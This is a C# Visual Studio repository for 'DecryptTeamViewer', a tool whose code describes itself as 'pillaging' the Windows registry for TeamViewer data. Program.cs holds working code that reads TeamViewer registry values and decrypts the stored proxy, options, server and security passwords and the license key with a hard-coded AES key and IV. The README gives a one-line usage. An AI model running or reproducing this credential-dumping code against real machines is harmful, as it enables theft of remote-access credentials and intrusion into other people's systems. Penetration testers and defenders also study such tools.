├── DecryptTeamViewer.sln
├── DecryptTeamViewer
    ├── App.config
    ├── DecryptTeamViewer.csproj
    ├── Program.cs
    └── Properties
    │   └── AssemblyInfo.cs
└── README.md


/DecryptTeamViewer.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.29728.190
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DecryptTeamViewer", "DecryptTeamViewer\DecryptTeamViewer.csproj", "{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {0C02553C-431C-4BB7-AEC1-3CDC69A660E8}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/DecryptTeamViewer/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/DecryptTeamViewer/DecryptTeamViewer.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>DecryptTeamViewer</RootNamespace>
10 |     <AssemblyName>DecryptTeamViewer</AssemblyName>
11 |     <TargetFrameworkVersion>v4.6</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |     <PublishUrl>publish\</PublishUrl>
16 |     <Install>true</Install>
17 |     <InstallFrom>Disk</InstallFrom>
18 |     <UpdateEnabled>false</UpdateEnabled>
19 |     <UpdateMode>Foreground</UpdateMode>
20 |     <UpdateInterval>7</UpdateInterval>
21 |     <UpdateIntervalUnits>Days</UpdateIntervalUnits>
22 |     <UpdatePeriodically>false</UpdatePeriodically>
23 |     <UpdateRequired>false</UpdateRequired>
24 |     <MapFileExtensions>true</MapFileExtensions>
25 |     <ApplicationRevision>0</ApplicationRevision>
26 |     <ApplicationVersion>1.0.0.%2a</ApplicationVersion>
27 |     <IsWebBootstrapper>false</IsWebBootstrapper>
28 |     <UseApplicationTrust>false</UseApplicationTrust>
29 |     <BootstrapperEnabled>true</BootstrapperEnabled>
30 |   </PropertyGroup>
31 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
32 |     <PlatformTarget>AnyCPU</PlatformTarget>
33 |     <DebugSymbols>true</DebugSymbols>
34 |     <DebugType>full</DebugType>
35 |     <Optimize>false</Optimize>
36 |     <OutputPath>bin\Debug\</OutputPath>
37 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
38 |     <ErrorReport>prompt</ErrorReport>
39 |     <WarningLevel>4</WarningLevel>
40 |   </PropertyGroup>
41 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
42 |     <PlatformTarget>AnyCPU</PlatformTarget>
43 |     <DebugType>pdbonly</DebugType>
44 |     <Optimize>true</Optimize>
45 |     <OutputPath>bin\Release\</OutputPath>
46 |     <DefineConstants>TRACE</DefineConstants>
47 |     <ErrorReport>prompt</ErrorReport>
48 |     <WarningLevel>4</WarningLevel>
49 |   </PropertyGroup>
50 |   <ItemGroup>
51 |     <Reference Include="System" />
52 |     <Reference Include="System.Core" />
53 |     <Reference Include="System.Xml.Linq" />
54 |     <Reference Include="System.Data.DataSetExtensions" />
55 |     <Reference Include="Microsoft.CSharp" />
56 |     <Reference Include="System.Data" />
57 |     <Reference Include="System.Net.Http" />
58 |     <Reference Include="System.Xml" />
59 |   </ItemGroup>
60 |   <ItemGroup>
61 |     <Compile Include="Program.cs" />
62 |     <Compile Include="Properties\AssemblyInfo.cs" />
63 |   </ItemGroup>
64 |   <ItemGroup>
65 |     <None Include="App.config" />
66 |   </ItemGroup>
67 |   <ItemGroup>
68 |     <BootstrapperPackage Include=".NETFramework,Version=v4.6">
69 |       <Visible>False</Visible>
70 |       <ProductName>Microsoft .NET Framework 4.6 %28x86 and x64%29</ProductName>
71 |       <Install>true</Install>
72 |     </BootstrapperPackage>
73 |     <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
74 |       <Visible>False</Visible>
75 |       <ProductName>.NET Framework 3.5 SP1</ProductName>
76 |       <Install>false</Install>
77 |     </BootstrapperPackage>
78 |   </ItemGroup>
79 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
80 | </Project>


--------------------------------------------------------------------------------
/DecryptTeamViewer/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Text;
  3 | using Microsoft.Win32;
  4 | using System.Security.Cryptography;
  5 | 
  6 | namespace DecryptTeamViewer
  7 | {
  8 |     class Program
  9 |     {
 10 |         static void Main(string[] args)
 11 |         {
 12 |             Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n");
 13 | 
 14 |             // TeamViewer version
 15 |             Console.WriteLine("\r\n=== TeamViewer version ===\r\n");
 16 |             Console.WriteLine(GetRegValue("TeamViewerSettings", "Version"));
 17 | 
 18 |             // User info
 19 |             Console.WriteLine("\r\n=== User Information ===\r\n");
 20 |             Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName"));
 21 |             Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName"));
 22 | 
 23 |             // Proxy info
 24 |             Console.WriteLine("\r\n=== Proxy Information ===\r\n");
 25 |             Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP"));
 26 |             Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername"));
 27 |             var proxyPass = (byte[])GetRegValue("TeamViewerSettings", "ProxyPasswordAES");
 28 |             Console.WriteLine("Proxy password: " + DecryptAES(proxyPass));
 29 | 
 30 |             // Credentials
 31 | 
 32 |             Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n");
 33 |             // Options pass
 34 |             var optionsPass = (byte[])GetRegValue("TeamViewerSettings", "OptionsPasswordAES");
 35 |             Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass));
 36 |             // Server pass
 37 |             var serverPass = (byte[])GetRegValue("TeamViewerSettings", "ServerPasswordAES");
 38 |             Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass));
 39 |             // Security pass
 40 |             var securityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordAES");
 41 |             var exportedSecurityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordExported");
 42 |             Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass));
 43 |             Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass));
 44 |             // License
 45 |             var licenseKey = (byte[])GetRegValue("TeamViewerSettings", "LicenseKeyAES");
 46 |             Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n");
 47 | 
 48 |         }
 49 |         public static object GetRegValue(string hive, string value)
 50 |         {
 51 |             // Gets registry values from TeamViewer keys
 52 |             Object regKeyValue = new Object();
 53 |             if (hive == "TeamViewerSettings")
 54 |             {
 55 |                 var regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\WOW6432Node\TeamViewer", false);
 56 |                 if (regKey != null)
 57 |                 {
 58 |                     regKeyValue = regKey.GetValue(value);
 59 |                 }
 60 |                 return regKeyValue;
 61 |             }
 62 |             else if (hive == "TeamViewerUserSettings")
 63 |             {
 64 |                 var regKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\TeamViewer", false);
 65 |                 if (regKey != null)
 66 |                 {
 67 |                     regKeyValue = regKey.GetValue(value);
 68 |                 }
 69 |                 return regKeyValue;
 70 |             }
 71 |             else
 72 |             {
 73 |                 regKeyValue = null;
 74 |                 return regKeyValue;
 75 |             }
 76 |         }
 77 | 
 78 |         public static string DecryptAES(byte[] encryptedPass)
 79 |         {
 80 |             try
 81 |             {
 82 |                 // AES settings
 83 |                 Aes aes = new AesManaged
 84 |                 {
 85 |                     Mode = CipherMode.CBC,
 86 |                     BlockSize = 128,
 87 |                     KeySize = 128,
 88 |                     Padding = PaddingMode.Zeros
 89 |                 };
 90 |                 // TeamViewer Key & IV
 91 |                 byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 };
 92 |                 byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 };
 93 | 
 94 |                 // Decrypt AES passwords
 95 |                 ICryptoTransform AESDecrypt = aes.CreateDecryptor(key, IV);
 96 |                 if (encryptedPass != null)
 97 |                 {
 98 |                     var decrytedPass = AESDecrypt.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length);
 99 |                     string plaintextPass = Encoding.Unicode.GetString(decrytedPass);
100 |                     return plaintextPass;
101 |                 }
102 |                 else
103 |                 {
104 |                     return null;
105 |                 }
106 |             }
107 |             catch (Exception)
108 |             {
109 |                 return null;
110 |             }
111 |         }
112 | 
113 |     }
114 | }
115 | 


--------------------------------------------------------------------------------
/DecryptTeamViewer/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("DecryptTeamViewer")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DecryptTeamViewer")]
13 | [assembly: AssemblyCopyright("Copyright ©  2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d6aaed62-bbfc-4f2a-a2a4-35ec5b2a4e07")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DecryptTeamViewer
2 | Enumerate and decrypt TeamViewer settings from registry
3 | 
4 | ## Usage
5 | .\DecryptTeamViewer.exe
6 | 
7 | ![alt tag](https://thevivi.net/wp-content/uploads/2020/02/DecryptTeamViewerUsage.png)
8 | 


--------------------------------------------------------------------------------